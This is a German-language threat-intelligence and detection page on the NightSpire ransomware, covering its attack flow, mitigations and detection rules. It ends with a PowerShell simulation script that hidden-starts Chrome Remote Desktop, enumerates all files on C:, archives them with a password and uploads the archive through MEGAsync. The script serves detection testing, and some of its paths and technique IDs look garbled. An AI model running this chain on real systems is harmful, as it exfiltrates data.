Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
NightSpire ist eine auf Go basierende Ransomware-Familie, die erstmals Anfang 2025 beobachtet wurde und ein Doppel-Erpressungsmodell verwendet, bei dem Daten vor der Verschlüsselung gestohlen und mit der Veröffentlichung auf einer Tor-basierten Leak-Site gedroht wird. Die Ransomware hängt eine .nspire -Erweiterung an verschlüsselte Dateien an und platziert Lösegeldforderungen in jedem betroffenen Verzeichnis, einschließlich der mit OneDrive verbundenen Ordner. Ihre Betreiber verlassen sich auf legitime Remote-Administrationstools, um den Zugang aufrechtzuerhalten, und nutzen öffentlich verfügbare Dienstprogramme für die Erkundung, Archivierung und Exfiltration. Zwischen März und Juni 2025 betraf die Kampagne mindestens 64 Organisationen in 33 Ländern.
Untersuchung
Die Untersuchung ergab, dass Angreifer häufig über exponiertes RDP anfänglichen Zugang erlangten und dann Chrome Remote Desktop und AnyDesk als persistente Dienste installierten. Sie nutzten Everything, um schnell Dateien zu finden, 7-Zip, um kennwortgeschützte Archive zu erstellen, und MEGAsync, um gestohlene Daten in den MEGA-Cloud-Speicher hochzuladen. Der auf Go basierende Verschlüsseler lief unter conhost.exe, zählte alle verfügbaren Laufwerke auf und verschlüsselte Dateien, während die OneDrive-Dateinamen unverändert blieben. Die Erpressungsphase stützte sich auf eine Tor-gehostete Leak-Site, die genutzt wurde, um Opfer nach der Exfiltration unter Druck zu setzen.
Minderung
Organisationen sollten die direkte RDP-Exposition reduzieren oder eliminieren, auf die unerwartete Bereitstellung legitimer Remote-Administrationstools als Dienste überwachen und Anwendungs-Whitelisting für Binärdateien wie Chrome Remote Desktop und AnyDesk anwenden. Verhaltensbasierte Erkennungen sollten sich auf die Massen-Dateienummerierung, Archivierung und ungewöhnliche Uploads zu Cloud-Speicherdiensten konzentrieren. Regelmäßige Backups und getestete Wiederherstellungsverfahren bleiben unerlässlich, und Netzwerkregeln sollten bekannte MEGA-Upload-Endpunkte blockieren. Verteidigungsmaßnahmen können auch durch kontrollierte Ransomware-Simulationsübungen wie die von Picus angeboten validiert werden.
Reaktion
Wenn NightSpire-Aktivität erkannt wird, isolieren Sie sofort den betroffenen Endpunkt, beenden Sie den Verschlüsselungsprozess und sammeln Sie flüchtigen Speicher zur Analyse. Deaktivieren Sie bösartige Dienste, entfernen Sie persistente Remote-Zugriffstools und blockieren Sie die zugehörige Netzwerkkommunikation. Die Wiederherstellung sollte von vertrauenswürdigen Backups erfolgen, und relevante Interessengruppen sollten benachrichtigt werden. Der Vorfall sollte auch den Strafverfolgungsbehörden gemeldet werden, während Verteidiger weiterhin die zugehörige Tor-Leak-Site auf Anzeichen veröffentlichter Daten überwachen.
graph TB %% Klassendefinitionen classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef process fill:#ffcc99 %% Knoten action_initial_access[„<b>Aktion</b> – Erstzugang<br/><b>Technik</b> – T1136 Kontoerstellung<br/><b>Beschreibung</b>: Der Angreifer erlangte Zugriff über Remote Desktop Protocol (RDP) und etablierte einen ersten Zugriffspunkt im Netzwerk.“] class action_initial_access action tool_rdp[„<b>Tool</b> – Remote Desktop Protocol (RDP)<br/><b>Beschreibung</b>: Ermöglicht Remote-Login auf Windows-Systeme.“] class tool_rdp tool action_persistence[„<b>Aktion</b> – Persistenz<br/><b>Technik</b> – T1547.009 Shortcut-Modifikation<br/><b>Beschreibung</b>: Installation von AnyDesk und Chrome Remote Desktop als Dienste sowie Platzierung von Autostart-Verknüpfungen im Startup-Ordner.“] class action_persistence action tool_anydesk[„<b>Tool</b> – AnyDesk<br/><b>Funktion</b>: Remote-Access-Software, als Windows-Dienst installiert (anydesk.lnk).“] class tool_anydesk tool tool_chrome_rd[„<b>Tool</b> – Chrome Remote Desktop<br/><b>Funktion</b>: Remote-Zugriff über remoting_host.exe Dienst.“] class tool_chrome_rd tool action_collection[„<b>Aktion</b> – Sammlung<br/><b>Technik</b> – T1560.001 Archivierung gesammelter Daten<br/><b>Beschreibung</b>: Verwendung von 7-Zip zur Komprimierung ausgewählter Ordner in passwortgeschützte Archive nach Dateien-Enumeration mit dem Tool Everything.“] class action_collection action tool_7zip[„<b>Tool</b> – 7-Zip<br/><b>Funktion</b>: Komprimiert Daten in passwortgeschützte Archive.“] class tool_7zip tool tool_everything[„<b>Tool</b> – Everything<br/><b>Funktion</b>: Schnelles Dateisuchwerkzeug zur Enumeration.“] class tool_everything tool action_exfiltration[„<b>Aktion</b> – Exfiltration<br/><b>Techniken</b> – T1537 Datenübertragung zu Cloud-Konten<br/>T1567.002 Exfiltration über Webdienste<br/><b>Beschreibung</b>: Upload der vorbereiteten Archive in die MEGA-Cloud über MEGAsync.“] class action_exfiltration action tool_megasync[„<b>Tool</b> – MEGAsync<br/><b>Funktion</b>: Synchronisiert lokale Dateien mit MEGA Cloud Storage zur Exfiltration.“] class tool_megasync tool action_impact[„<b>Aktion</b> – Wirkung<br/><b>Technik</b> – T1486 Datenverschlüsselung zur Wirkung<br/><b>Beschreibung</b>: Go-basierter Ransomware-Encryptor wurde über conhost.exe ausgeführt, verschlüsselte Dateien, fügte .nspire-Endung hinzu und legte Erpressungsnotizen ab.“] class action_impact action malware_encryptor[„<b>Malware</b> – Go-Ransomware<br/><b>Funktion</b>: Verschlüsselt Dateien, fügt Erweiterung hinzu, erstellt Erpressungsnotizen.“] class malware_encryptor malware process_conhost[„<b>Prozess</b> – conhost.exe<br/><b>Rolle</b>: Startet die Ausführung des Go-Ransomware-Payloads.“] class process_conhost process %% Verbindungen action_initial_access –>|verwendet| tool_rdp action_initial_access –>|führt zu| action_persistence action_persistence –>|installiert| tool_anydesk action_persistence –>|installiert| tool_chrome_rd action_persistence –>|führt zu| action_collection action_collection –>|verwendet| tool_7zip action_collection –>|enumeriert mit| tool_everything action_collection –>|führt zu| action_exfiltration action_exfiltration –>|verwendet| tool_megasync action_exfiltration –>|führt zu| action_impact action_impact –>|führt aus| process_conhost process_conhost –>|startet| malware_encryptor
Angriffsfluss
Erkennungen
Mögliche Datenerfassung [7zip] (über cmdline)
Anzeigen
Alternative Remote-Access- / Verwaltungssoftware (über process_creation)
Anzeigen
Mögliche versteckte Installation von Chrome Remote Desktop (über cmdline)
Anzeigen
Alternative Remote-Access- / Verwaltungssoftware (über System)
Anzeigen
Alternative Remote-Access- / Verwaltungssoftware (über Audit)
Anzeigen
Erkennung persistenter und exfiltrationsbasierter Werkzeuge von NightSpire-Ransomware [Windows-Prozesserstellung]
Anzeigen
Simulation Ausführung
Voraussetzung: Die Telemetrie- und Basislinien-Vorprüfung muss bestanden werden.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen müssen die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffs-Narrativ & Befehle:
- Persistenz-Setup (T1547 / T1219): Chrome Remote Desktop (Standardpfad) installieren und dessen Dienst starten, um beständigen Fernzugriff zu erhalten.
- Entdeckung (T1083): Everything.exe verwenden, um alle Dateien auf dem C: Laufwerk zu erfassen und die Ausgabe in einer temporären Liste zu speichern.
- Archivierung (T1037 / T1083): 7‑Zip aufrufen, um die erfassten Dateien in ein kennwortgeschütztes Archiv zu komprimieren.
- Exfiltration (T1219.003): MEGAsync starten, um das Archiv zu einem MEGA-Konto hochzuladen.
Die Sequenz stellt sicher, dass selection_remote_access (Chrome Remote Desktop) aktiv ist, während mindestens einer von selection_discovery, selection_archive, oder selection_exfiltration auftritt und die Bedingung der Regel erfüllt.
-
Regressionstest-Skript:
# ------------------------------------------------------------------------- # NightSpire Seitliche Persistenz & Exfiltration Simulation # ------------------------------------------------------------------------- # Voraussetzungen: # - Chrome Remote Desktop im Standardpfad installiert # - Everything.exe im Standardpfad installiert # - 7z.exe im Standardpfad installiert # - MEGAsync im Standardbenutzerprofilpfad installiert # ------------------------------------------------------------------------- # 1. Chrome Remote Desktop-Dienst sicherstellen (simuliert Persistenz) $crdPath = "$Env:ProgramFiles(x86)GoogleChrome Remote Desktop147.0.7727.3remoting_host.exe" if (Test-Path $crdPath) { Start-Process -FilePath $crdPath -ArgumentList "--start-service" -WindowStyle Hidden Write-Host "Chrome Remote Desktop-Dienst gestartet." } else { Write-Error "Chrome Remote Desktop nicht gefunden bei $crdPath" exit 1 } # 2. Dateierfassung mit Everything $everythingPath = "$Env:ProgramFilesEverythingEverything.exe" $discoveryOutput = "$env:TEMPfilelist.txt" if (Test-Path $everythingPath) { & $everythingPath -search "C:" -output $discoveryOutput Write-Host "Erfassung abgeschlossen, Ergebnisse gespeichert in $discoveryOutput" } else { Write-Error "Everything.exe nicht gefunden bei $everythingPath" exit 1 } # 3. Die erfassten Dateien mit 7‑Zip archivieren $sevenZipPath = "$Env:ProgramFiles7-Zip7z.exe" $archivePath = "$env:TEMPexfil_archive.zip" if (Test-Path $sevenZipPath) { & $sevenZipPath a -tzip $archivePath "@$discoveryOutput" -p"StarkP@ssw0rd!" Write-Host "Archiv erstellt bei $archivePath" } else { Write-Error "7z.exe nicht gefunden bei $sevenZipPath" exit 1 } # 4. Archiv über MEGAsync hochladen (Exfiltration) $megaPath = "$Env:LOCALAPPDATAMEGAsyncMEGAsync.exe" if (Test-Path $megaPath) { & $megaPath --upload $archivePath Write-Host "Upload über MEGAsync initiiert." } else { Write-Error "MEGAsync.exe nicht gefunden bei $megaPath" exit 1 } # Ende der Simulation -
Bereinigung-Befehle:
# Chrome Remote Desktop-Dienst stoppen Stop-Process -Name "remoting_host" -Force -ErrorAction SilentlyContinue # Temporäre Dateien entfernen Remove-Item -Path "$env:TEMPfilelist.txt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPexfil_archive.zip" -Force -ErrorAction SilentlyContinue # MEGAsync ggf. stoppen, falls es läuft Stop-Process -Name "MEGAsync" -Force -ErrorAction SilentlyContinue